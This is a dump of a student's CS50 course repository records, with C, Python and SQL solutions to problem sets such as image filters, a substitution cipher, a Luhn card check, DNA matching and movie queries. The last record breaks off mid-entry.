"text": "#include \"helpers.h\"\n\n// Convert image to grayscale\nvoid grayscale(int height, int width, RGBTRIPLE image[height][width])\n{\n //go through the image\n for (int i = 0; i < height; i++)\n {\n int gray_value;\n for (int j = 0; j < width; j++)\n {\n //calculate the average of the colour channels\n gray_value = round((image[i][j].rgbtBlue + image[i][j].rgbtGreen + image[i][j].rgbtRed) / 3.0);\n //assign the grey value to the different channels\n image[i][j].rgbtBlue = gray_value;\n image[i][j].rgbtGreen = gray_value;\n image[i][j].rgbtRed = gray_value;\n }\n }\n}\n\n// Reflect image horizontally\nvoid reflect(int height, int width, RGBTRIPLE image[height][width])\n{\n //temporal var\n RGBTRIPLE tmp;\n\n int mid;\n //depending if the width is even or odd we calculate a bit different to optimize the calculations\n if (width % 2 == 0)\n {\n mid = (width / 2) - 1;\n }\n else\n {\n mid = width / 2;\n }\n //go through the image\n for (int i = 0; i < height; i++)\n {\n //now we iterate till the mid pixel, not through the whole row\n for (int j = 0; j <= mid; j++)\n {\n //we have to swap values from the pixel that is 'mirroring'\n int mirror = width - j - 1;\n tmp = image[i][j];\n image[i][j] = image[i][mirror];\n image[i][mirror] = tmp;\n }\n }\n}\n\n// Blur image\nvoid blur(int height, int width, RGBTRIPLE image[height][width])\n{\n float counter;\n int sumblue, sumgreen, sumred;\n int x;\n int y;\n //temporary image to store new values\n RGBTRIPLE imgtemp [height][width];\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n counter = 0.0;\n sumred = 0;\n sumgreen = 0;\n sumblue = 0;\n \n //now we start iterating through a sub-array around the pixel\n \n for (int h = -1; h <= 1; h++)\n {\n x = i + h;\n for (int w = -1; w <= 1; w ++)\n {\n y = j + w;\n\n if ((x >= 0 && y >= 0) && (x < height && y < width))\n {\n sumred += image[x][y].rgbtRed;\n sumgreen += image[x][y].rgbtGreen;\n sumblue += image[x][y].rgbtBlue;\n counter++;\n }\n }\n }\n imgtemp[i][j].rgbtRed = round(sumred / counter);\n imgtemp[i][j].rgbtGreen = round(sumgreen / counter);\n imgtemp[i][j].rgbtBlue = round(sumblue / counter);\n }\n }\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n image[i][j].rgbtRed = imgtemp[i][j].rgbtRed;\n image[i][j].rgbtGreen = imgtemp[i][j].rgbtGreen;\n image[i][j].rgbtBlue = imgtemp[i][j].rgbtBlue;\n }\n }\n}\n\n// Detect edges\nvoid edges(int height, int width, RGBTRIPLE image[height][width])\n{\n return;\n}\n"
},
{
"alpha_fraction": 0.5460993051528931,
"alphanum_fraction": 0.563829779624939,
"avg_line_length": 20.769229888916016,
"blob_id": "2bcd6a0a32f7f434d688d9fdd58f47142fb2bacf",
"content_id": "9c4449166397b5e1cbf83951fbd2c413c6ec70a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 13,
"path": "/pset2/commandline.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n\nint main(int argc, string argv[])\n{\n if(argc != 2)\n {\n printf(\"arguments error on command line; only %i arguments.\\n\", argc);\n return -1;\n }\n printf(\"Hello, %s\\n\", argv[1]);\n printf(\"Argument number: %i\\n\", argc);\n}"
},
{
"alpha_fraction": 0.7197452187538147,
"alphanum_fraction": 0.7452229261398315,
"avg_line_length": 38.5,
"blob_id": "6649b23ed8b8dd94edf7010162f4f9a942756bb0",
"content_id": "4cb59566317777e3d2d4cfdd63207f75a1b4fd18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 4,
"path": "/pset7/movies/7.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT m.title, r.rating FROM movies m\nINNER JOIN ratings r ON m.id = r.movie_id \nWHERE year = 2010 and r.rating IS NOT NULL\nORDER BY rating DESC, title ASC"
},
{
"alpha_fraction": 0.7049180269241333,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 33,
"blob_id": "fa4377227f58edc9dd2bbdae93aea26db8cbf5af",
"content_id": "02ffa770deaae108f24a5ead20849a9246a0eb1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/pset7/movies/12.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT (m.title) FROM movies m\nINNER JOIN people p ON p.id = s.person_id\nINNER JOIN stars s ON s.movie_id = m.id\nWHERE p.name = 'Johnny Depp'\nINTERSECT\nSELECT DISTINCT (m.title) FROM movies m\nINNER JOIN people p ON p.id = s.person_id\nINNER JOIN stars s ON s.movie_id = m.id\nWHERE p.name = 'Helena Bonham Carter'"
},
{
"alpha_fraction": 0.547397792339325,
"alphanum_fraction": 0.571561336517334,
"avg_line_length": 33.74193572998047,
"blob_id": "1582ed0890a26a329f1b23e892c769c6edc62908",
"content_id": "3cccbea9700563f8a485fa09459b98fec996f7db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1076,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 31,
"path": "/pset3/test.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#define INITIAL_CAPACITY 2\n\nvoid push(int *arr, int index, int value, int *size, int *capacity){\n if(*size > *capacity){\n arr = realloc(arr, (*size + 1) * sizeof(int));\n *capacity = *size + 1;\n //printf(\"capacity: %d\\n\", *capacity);\n }\n arr[index] = value;\n *size = *size + 1;\n}\nint main(){\n int size = 0;\n int capacity = INITIAL_CAPACITY;\n int* arr = malloc(INITIAL_CAPACITY * sizeof(int));\n push(arr, 0, 9, &size, &capacity);\n push(arr, 1, 2, &size, &capacity);\n printf(\"Current size: %d\\n\", size); // Current capacity: 16\n push(arr, 2, 3, &size, &capacity);\n printf(\"Current size: %d\\n\", size); // Current capacity: 16\n \n printf(\"Current capacity: %d\\n\", capacity); // Current capacity: 2\n push(arr, 3, 4, &size, &capacity);\n push(arr, 4, 5, &size, &capacity);\n push(arr, 5, 6, &size, &capacity);\n \n printf(\"Current capacity: %d\\n\", capacity); // Current capacity: 16\n printf(\"Current size: %d\\n\", size); // Current capacity: 16\n}"
},
{
"alpha_fraction": 0.48884379863739014,
"alphanum_fraction": 0.5118322968482971,
"avg_line_length": 31.632352828979492,
"blob_id": "03542ad3ffa0ef7a162b646c25ea1fe970b6deb8",
"content_id": "23a4b595334720f04f8d2a34b48b1069bcd4d598",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4437,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 136,
"path": "/pset4/filter-less/helpers.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include \"helpers.h\"\n#include <math.h>\n\nint checkpixvalue(int channel_value);\n\n// Convert image to grayscale\nvoid grayscale(int height, int width, RGBTRIPLE image[height][width])\n{\n //go through the image\n for (int i = 0; i < height; i++)\n {\n int gray_value;\n for (int j = 0; j < width; j++)\n {\n //calculate the average of the colour channels\n gray_value = round((image[i][j].rgbtBlue + image[i][j].rgbtGreen + image[i][j].rgbtRed) / 3.0);\n //assign the grey value to the different channels\n image[i][j].rgbtBlue = gray_value;\n image[i][j].rgbtGreen = gray_value;\n image[i][j].rgbtRed = gray_value;\n }\n }\n}\n\n// Convert image to sepia\nvoid sepia(int height, int width, RGBTRIPLE image[height][width])\n{\n //sepia formula\n // sepiaRed = .393 * originalRed + .769 * originalGreen + .189 * originalBlue\n // sepiaGreen = .349 * originalRed + .686 * originalGreen + .168 * originalBlue\n // sepiaBlue = .272 * originalRed + .534 * originalGreen + .131 * originalBlue\n int sepiared = 0, sepiagreen = 0, sepiablue = 0;\n //go through the image\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n //check if the value goes beyond 0xff to set the maximum in that case\n sepiared = checkpixvalue(round(0.393 * image[i][j].rgbtRed + 0.769 * image[i][j].rgbtGreen + 0.189 * image[i][j].rgbtBlue));\n sepiagreen = checkpixvalue(round(0.349 * image[i][j].rgbtRed + 0.686 * image[i][j].rgbtGreen + 0.168 * image[i][j].rgbtBlue));\n sepiablue = checkpixvalue(round(0.272 * image[i][j].rgbtRed + 0.534 * image[i][j].rgbtGreen + 0.131 * image[i][j].rgbtBlue));\n //assign the grey value to the different channels\n image[i][j].rgbtBlue = sepiablue;\n image[i][j].rgbtGreen = sepiagreen;\n image[i][j].rgbtRed = sepiared;\n }\n }\n}\n\n// Reflect image horizontally\nvoid reflect(int height, int width, RGBTRIPLE image[height][width])\n{\n //temporal var\n RGBTRIPLE tmp;\n\n int mid;\n //depending if the width is even or odd we calculate a bit different to optimize the calculations\n if (width % 2 == 0)\n {\n mid = (width / 2) - 1;\n }\n else\n {\n mid = width / 2;\n }\n //go through the image\n for (int i = 0; i < height; i++)\n {\n //now we iterate till the mid pixel, not through the whole row\n for (int j = 0; j <= mid; j++)\n {\n //we have to swap values from the pixel that is 'mirroring'\n int mirror = width - j - 1;\n tmp = image[i][j];\n image[i][j] = image[i][mirror];\n image[i][mirror] = tmp;\n }\n }\n}\n\n// Blur image\nvoid blur(int height, int width, RGBTRIPLE image[height][width])\n{\n float counter;\n int sumblue, sumgreen, sumred;\n int x;\n int y;\n //temporary image to store new values\n RGBTRIPLE imgtemp [height][width];\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n counter = 0.0;\n sumred = 0;\n sumgreen = 0;\n sumblue = 0;\n \n //now we start iterating through a sub-array around the pixel\n \n for (int h = -1; h <= 1; h++)\n {\n x = i + h;\n for (int w = -1; w <= 1; w ++)\n {\n y = j + w;\n\n if ((x >= 0 && y >= 0) && (x < height && y < width))\n {\n sumred += image[x][y].rgbtRed;\n sumgreen += image[x][y].rgbtGreen;\n sumblue += image[x][y].rgbtBlue;\n counter++;\n }\n }\n }\n imgtemp[i][j].rgbtRed = round(sumred / counter);\n imgtemp[i][j].rgbtGreen = round(sumgreen / counter);\n imgtemp[i][j].rgbtBlue = round(sumblue / counter);\n }\n }\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n image[i][j].rgbtRed = imgtemp[i][j].rgbtRed;\n image[i][j].rgbtGreen = imgtemp[i][j].rgbtGreen;\n 
image[i][j].rgbtBlue = imgtemp[i][j].rgbtBlue;\n }\n }\n}\n\nint checkpixvalue(int channel_value)\n{\n return round(channel_value) > 255 ? 255 : round(channel_value);\n}"
},
{
"alpha_fraction": 0.675000011920929,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 19,
"blob_id": "69021ecf5507e89c7e4440accb4653a5dc7d2eff",
"content_id": "4f49bd70baaa326c79ca32626eb140606700380a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/pset6/hello.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport sys\n#get input \nname = input(\"What's your name?\\n\")\n# print the salutation\nprint(\"Hello, \", name)\n"
},
{
"alpha_fraction": 0.5049999952316284,
"alphanum_fraction": 0.5393750071525574,
"avg_line_length": 27.553571701049805,
"blob_id": "382be7f03e82efd7e29da36e35445b41e8f79c8e",
"content_id": "8c9a7628e2694e31b2e3dea8c5b2b5f936ee2029",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1600,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 56,
"path": "/pset2/readability/readability.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <ctype.h>\n#include <string.h>\n#include <math.h>\n\nint main(void)\n{\n //ask the user for the text that will be parsed\n string text = get_string(\"Text: \\n\");\n \n //length of the text\n int len = strlen(text);\n\n //initialise some variables\n int letters = 0, sentences = 0, words = 0;\n\n //Checks for the number of letters\n for (int i = 0, n = len; i <= n; i++)\n {\n //Checks if a character is an alphanumeric character\n if (isalpha(text[i]))\n {\n letters++;\n }\n //Checks if a character is a space\n else if (isspace(text[i]) || text[i] == '\\0')\n {\n words++;\n }\n else if (text[i] == '.' || text[i] == '!' || text[i] == '?')\n {\n sentences++;\n }\n }\n printf(\"%i letters, %i words, %i sentences\\n\", letters, words, sentences);\n //calculate L & S of Coleman-Liau index\n //to be precised we must cast the integers into floats first\n float L = (float)letters / (float)words * 100.00;\n float S = (float)sentences / (float)words * 100.00;\n\n //calculate the index of readability of Coleman-Liau.\n //the formula is: index = 0.0588 * L - 0.296 * S - 15.8\n int index = round(0.0588 * L - 0.296 * S - 15.8); \n\n string grade = \"Grade\";\n //if grade is between 1 and 16 \n if (index >= 1 && index <=16)\n printf(\"%s %i\\n\", grade, index);\n //index is higher that 16\n else if (index > 16)\n printf(\"%s 16+\\n\", grade);\n //grade index below 1\n else\n printf(\"Before Grade 1\\n\");\n}\n\n"
},
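The Coleman-Liau logic in readability.c above compresses to a few lines of Python. A minimal sketch under the same counting rules (letters, whitespace-separated words, and '.', '!', '?' as sentence ends), offered only as a cross-check for non-empty text, not as the graded solution:

def coleman_liau(text):
    # Same counting rules as the C version above.
    letters = sum(c.isalpha() for c in text)
    words = len(text.split())
    sentences = sum(c in ".!?" for c in text)
    # L and S are letters and sentences per 100 words.
    L = letters / words * 100
    S = sentences / words * 100
    return round(0.0588 * L - 0.296 * S - 15.8)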
{
"alpha_fraction": 0.5363305807113647,
"alphanum_fraction": 0.5613079071044922,
"avg_line_length": 30.028169631958008,
"blob_id": "fcd05d370cf43d9fddefdeea050748ecef709ca4",
"content_id": "c3a1a7cf38b62d04cf935775db80ff868c6000b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2203,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 71,
"path": "/pset6/credit/credit.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\nimport math\n\ndef main():\n # message\n result = \"INVALID\"\n \n while True:\n # ask for the change owed\n creditcard = cs50.get_int(\"Number: \")\n if creditcard >= 0:\n break\n # get the lenght of the CC number (easier in pyhton than C)\n # it could be done using this math calculation:\n # length = int(math.log10(creditcard))+1 \n # or simply getting the string (an array in fact)\n digits = str(creditcard)\n length = len(digits) \n # because we got the number as integer but in Python it is a string by default\n \n # control digit \n sum = int(digits[-1])\n \n # parity to know which are the digits to multiply\n parity = length % 2\n\n # now we can iterate through digits of the credit card but the last one (control)\n for i in range (length-1):\n \n #extract the digit\n digit = int(digits[i])\n #check if it equals to parity\n if i % 2 == parity:\n digit = digit * 2\n # if we go over 9 we need to get the sum of both ( x * 2 = y > 9 => x + y)\n if digit > 9:\n digit -= 9\n sum += digit\n \n # this is another way to calcultate the control digit.\n # the check digit (x) is obtained by computing the sum of the\n # digits (third row) then subtracting the units digit from 10 \n if sum % 10 == 0:\n first_digit = int(digits[0])\n second_digit = int(digits[1])\n if (length == 15 and first_digit == 3 and (second_digit == 4 or second_digit == 7)):\n result = \"AMEX\"\n elif (length == 16 and first_digit == 5 and\n (second_digit == 1 or second_digit == 2 or second_digit == 3 or second_digit == 4 or second_digit == 5)):\n result = \"MASTERCARD\"\n elif ((length == 13 or length == 16) and first_digit == 4):\n result = \"VISA\"\n print(f\"{result}\")\n\n\ndef getDigitsArray(digits, number):\n \n factor = 1\n temp = number\n while temp != 0:\n temp = temp / 10\n factor = factor * 10\n i = 0\n while factor > 1:\n factor = factor / 10\n digits[i] = number // factor\n number = number % factor\n i += 1\n\nmain()"
},
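The `i % 2 == parity` test in credit.py encodes Luhn's rule of doubling every second digit counted from the right; scanned directly from the right, the same check reads more plainly. A sketch of that equivalent formulation (validation only, no issuer detection):

def luhn_valid(number):
    digits = [int(d) for d in str(number)]
    total = 0
    # Walk from the rightmost digit; double every second digit.
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# luhn_valid(4111111111111111) -> True (a standard Visa test number)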
{
"alpha_fraction": 0.5029940009117126,
"alphanum_fraction": 0.522455096244812,
"avg_line_length": 24.730770111083984,
"blob_id": "93839bbf25f2e8528a4016a61100da2626ab2ee3",
"content_id": "6841c62ab15bcfe77ae8708711515875f3b79d5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 668,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 26,
"path": "/pset6/mario/more/mario.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\n\n#ask until valid height value\nwhile True:\n height = cs50.get_int(\"Height: \")\n if height >= 1 and height <= 8:\n break\n\n# loop for pyramid height\nfor h in range (0, height):\n\n # loop to draw the pyramid blocks\n for b in range (0, height + 1 + h):\n \n # empty spaces until the base = height - 1 - current height\n if b >= height - 1 - h:\n print(\"#\", end = \"\")\n else:\n print(\" \", end = \"\")\n # if we have finished first side of the pyramid add empty spaces\n if b == height - 1:\n print(\" \", end = \"\")\n \n # insert a new line\n print(\"\", end=\"\\n\")"
},
{
"alpha_fraction": 0.5846921801567078,
"alphanum_fraction": 0.5920132994651794,
"avg_line_length": 26.56880760192871,
"blob_id": "9d6cedcc247b56ce09b99a6f315de83c89e316f6",
"content_id": "51d5e3a6c1c7af3c83dbe342506203a0c4de7a59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3008,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 109,
"path": "/pset6/dna/dna.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import cs50\nimport csv\nfrom sys import argv, exit\n\n\ndef main():\n # number of arguments\n argc = len(argv)\n\n # dna sequence\n dna = \"\"\n\n # result dicctionary of STRs\n results = {}\n\n # if there aren't two params with data and sequence then exit\n if argc != 3:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n exit(1)\n\n # get data file path + name\n dbfilename = argv[1]\n # get sequence file path + name\n secfilename = argv[2]\n\n # if they don't fit the expected extension then exit\n if dbfilename.find(\".csv\") == -1 or secfilename.find(\".txt\") == -1:\n print(\"Usage: python dna.py data.csv sequence.txt\")\n exit(1)\n\n # open the files\n dbfile = open(dbfilename, \"r\")\n if dbfile:\n database = csv.reader(dbfile)\n else:\n exit(1)\n\n # open sequence file and read them all\n seqfile = open(secfilename, \"r\")\n if seqfile:\n dna = seqfile.read()\n else:\n exit(1)\n\n # get the header (sequences)\n # and calculate the SRTs in the DNA\n fieldnames = next(database)\n for strs in fieldnames[1:]:\n results[strs]= numberofstrs(dna, strs)\n\n # result\n match = \"No match\"\n\n # conver result dic into a list of values to compare with user db\n strslist = list(results.values())\n \n # iterate the users database\n for row in database:\n # number of coincidences\n coincidence = 0 \n\n # the list of results\n for i in range (len(strslist)):\n if int(row[i + 1]) == int(strslist[i]):\n coincidence += 1 \n # after each iteration we look for the amount of coincidences. If it's equals to the total of results we found a match\n if coincidence == len(strslist):\n # getting name of the match\n match = row[0]\n break\n print(match)\n exit(0)\n\n\ndef numberofstrs(dna, sequence):\n\n # get the dna total length \n dnalen = len(dna)\n # sequence length\n seqlen = len(sequence)\n # flag\n found = 0\n #counter\n maxconsecutive = 0\n\n #find the first sequence in the DNA\n pos = dna.find(sequence)\n\n # if we found someting we go through the DNA looking for the STRs\n while pos <= dnalen and pos != -1:\n # we examine 'chunks' of DNA adding the length of the sequence we are looking for\n if dna[pos: pos + seqlen] == sequence:\n # we found the sequence\n found += 1 \n # move the cursor to the next chunk of DNA (increase the sequence length)\n pos += seqlen\n if found > maxconsecutive:\n # if the found chunks are bigger than in the previous range we increase to get the max of STRs\n maxconsecutive = found \n else:\n # there's no found sequence so we restart the flag\n found = 0\n # find for the next ocurrence in the DNA starting from last position\n pos = dna.find(sequence, pos)\n\n return maxconsecutive\n\n\nmain()\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5153846144676208,
"avg_line_length": 20.66666603088379,
"blob_id": "c42a20555cbfeaf87dacf11885642c830405c4d3",
"content_id": "840f8d5cfb90033c03d877946878c0466cc59bd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 390,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 18,
"path": "/pset2/searches.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n\nint main(void)\n{\n bool error = true;\n printf(\"What kind of search do you want to use?\\n\");\n do\n {\n //this program implements different searches algorithms\n int search = get_int(\" 1.- lineal, 2.- binary: \");\n if(search == 1 || search == 2)\n error = false;\n \n \n }\n while(error);\n}\n"
},
{
"alpha_fraction": 0.5345489382743835,
"alphanum_fraction": 0.5457453727722168,
"avg_line_length": 24.631147384643555,
"blob_id": "ceeb0ea8ec456a7d27baa3b11c9128f8bc1507ce",
"content_id": "c941c44aebc8213d828b8e61654f93a1f91fc025",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3126,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 122,
"path": "/pset2/substitution.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <string.h>\n#include <ctype.h>\n#include <stdlib.h>\n\n//function definition \nbool is_valid_key(char *str);\nvoid error_message(int error_code);\nbool is_unique_characters_string(char *str);\n\nint main(int argc, string argv[])\n{\n //if user does not provide the \"key\" stop the program\n if(argc < 2 || argc > 2)\n {\n error_message(1);\n return 1;\n }\n else if (strlen(argv[1]) < 26 || !is_valid_key(argv[1]))\n {\n error_message(2);\n return 1;\n }\n else if (!is_unique_characters_string(argv[1]))\n {\n error_message(3);\n return 1;\n }\n\n \n //get key to cypher\n char *key = argv[1]; \n \n //ask the user for the text that will be parsed\n string plaintext = get_string(\"plaintext: \");\n \n //length of the text\n int len = strlen(plaintext);\n char *ciphertext = malloc(strlen(plaintext) + 1);\n\n\n //Checks for the number of letters\n int ascii_code = 0, new_code = 0, position = 0;\n \n for (int i = 0, n = len; i < n; i++)\n {\n //Checks if a character is an alphanumeric character\n if (isalpha(plaintext[i]))\n {\n //choose the base of ASCII code depending if character is upper or lower.\n int base = isupper(plaintext[i]) ? 65 : 97;\n //get actual ascii code\n ascii_code = plaintext[i];\n\n //look for the relative position in the alphabet\n position = ascii_code - base;\n\n //letter from our keypass phrase\n char substitute = key[position];\n //get new ascii code remaining capitalized letters\n ciphertext[i] = isupper(plaintext[i]) ? toupper(substitute) : tolower(substitute);\n \n }\n else\n {\n //exclude all no alphanumeric characters \n ciphertext[i] = plaintext[i];\n } \n }\n printf(\"ciphertext: %s\\n\", ciphertext);\n}\n\nbool is_valid_key(char *str)\n{\n // loop Through each character in the string\n for(int i = 0, n = strlen(str); i < n; i++)\n {\n if(!isalpha(str[i])) // Check if a single character \"x\" its a letter\n {\n return false; // if its not return false\n } \n }\n return true; // else return true\n}\n\nbool is_unique_characters_string(char *str)\n{\n int len = strlen(str);\n // If at any time we encounter 2 \n // same characters, return false \n for (int i = 0; i < len - 1; i++) { \n for (int j = i + 1; j < len; j++) { \n if (str[i] == str[j]) { \n return false; \n } \n } \n } \n //no duplication found \n return true;\n}\n\nvoid error_message(int code_error)\n{\n string message = \"\";\n switch (code_error)\n {\n case 1:\n message = \"Usage: ./substitution key\";\n break;\n case 2:\n message = \"Key must contain 26 characters.\";\n break; \n case 3:\n message = \"Key must not contain repeated characters\";\n break;\n default:\n message = \"Something went wrong. Please, try again\";\n break; \n }\n printf(\"%s\\n\", message); \n}"
},
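The base-65/base-97 offset arithmetic in substitution.c is one way to map a letter to its key counterpart; a translation table expresses the same cipher more directly. A minimal Python sketch, assuming the 26-letter key has already been validated:

import string

def substitute(plaintext, key):
    # Map a..z and A..Z onto the key, preserving case; other characters pass through.
    table = str.maketrans(string.ascii_lowercase + string.ascii_uppercase,
                          key.lower() + key.upper())
    return plaintext.translate(table)

# substitute("Hello!", "YTNSHKVEFXRBAUQZCLWDMIPGJO") -> "Ehbbq!"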
{
"alpha_fraction": 0.565504252910614,
"alphanum_fraction": 0.5852968692779541,
"avg_line_length": 24.261905670166016,
"blob_id": "66be5363546fac42ca84f129e6aa9c735ef81c18",
"content_id": "48fc4f36b204796a6738cd08e352d08d05aa2376",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 42,
"path": "/pset1/cash.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <math.h>\n\nint findCoins(int cents, int coin_array[], int position);\n\nint main(void)\n{\n bool error = true;\n float dollars = 0.00;\n int coin_array[4] = {25, 10, 5, 1};\n int array_size = (int)(sizeof coin_array / sizeof coin_array[0]);\n do\n {\n //ask for the changed owed\n dollars = get_float(\"Change owed: \");\n if (dollars >= 0)\n {\n error = false;\n }\n }\n while (error);\n\n //round input to cents\n int cents = round(dollars * 100);\n int coins = 0;\n //recursive function call to get coins ammount\n coins = findCoins(cents, coin_array, 0);\n printf(\"%i\\n\", coins);\n}\nint findCoins(int cents, int coin_array[], int position)\n{\n //get number of coins of selected one\n int coins = cents / coin_array[position];\n int remain = cents % coin_array[position];\n //if there's a remainder we need to go to the next one\n if (remain != 0)\n {\n coins += findCoins(remain, coin_array, position + 1);\n }\n return coins;\n}\n"
},
{
"alpha_fraction": 0.490848571062088,
"alphanum_fraction": 0.5130338072776794,
"avg_line_length": 23.053333282470703,
"blob_id": "eb43efd4ce3ef8793b9b8e1ed4ccfac49c6ab315",
"content_id": "2a5b99ffafe548a595bc64343261f7a99c4c297b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1803,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 75,
"path": "/algorithms/binarysearchrecursive.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nint print_array(int array[], int size);\nint binary_search(int list[], int start, int end, int key);\n\nclock_t c1,c2;\nint main(void)\n{\n int n;\n int list[] = {1,2,4,5,6,7,9,12};\n int found = -1;\n int pos = 0;\n \n\n printf(\"Type your number: \");\n scanf(\"%d\", &n);\n \n int size = sizeof list / sizeof list[0];\n print_array(list, size);\n \n //start timer\n clock_t c0 = clock();\n found = binary_search(list, 0, size-1, n);\n\n c2 = clock();\n double found_diff_ms = (c1 - c0) * 1000. / CLOCKS_PER_SEC;\n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n\n if(found == 0)\n {\n printf(\"Your number was found! in %f ms\\n\", found_diff_ms);\n }\n else\n {\n printf(\"Your number was not found!\\n\");\n }\n printf(\"Search took in total: %f ms\\n\", total_diff_ms);\n}\n\nint binary_search(int list[], int start, int end, int key)\n{\n //loop while start is still lower that end point\n while (start <= end)\n {\n int mid = (start + end) / 2;\n printf(\"start: %i, end: %i, mid: %i. Value: %i\\n\", start, end, mid, list[mid]);\n if (list[mid] == key)\n {\n c1 = clock();\n return 0;\n }\n else if (key < list[mid])\n {\n //shorten the range and start again (recursive candidate)\n return binary_search(list, start, mid - 1, key); \n }\n else\n {\n //look for the value on the other side \n return binary_search(list, mid + 1, end, key);\n }\n }\n return -1;\n}\nint print_array(int array[], int size)\n{\n for (int i = 0; i < size; i++)\n {\n i < size-1 ? printf(\"%i, \", array[i]) : printf(\"%i\", array[i]);\n }\n printf(\"\\n\");\n return 0;\n}"
},
{
"alpha_fraction": 0.7931034564971924,
"alphanum_fraction": 0.8275862336158752,
"avg_line_length": 37.66666793823242,
"blob_id": "ceeb4de9a5bd5840468f3581de87169ef2154846",
"content_id": "21786c3be6748aa0ed75b4f9fdfe30ec670c478b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 3,
"path": "/README.md",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "# CS50 Problems Set\n\nProblems solved and some other practises around CS50's Introduction to Computer Science course\n"
},
{
"alpha_fraction": 0.4453125,
"alphanum_fraction": 0.4765625,
"avg_line_length": 21.77777862548828,
"blob_id": "8233e5cee6e6e596026dbddd30ac75c1f0f8e85c",
"content_id": "b97d6fe92ea080917a0e21e656178fc7b0c17c1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 45,
"path": "/algorithms/linearsearch.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
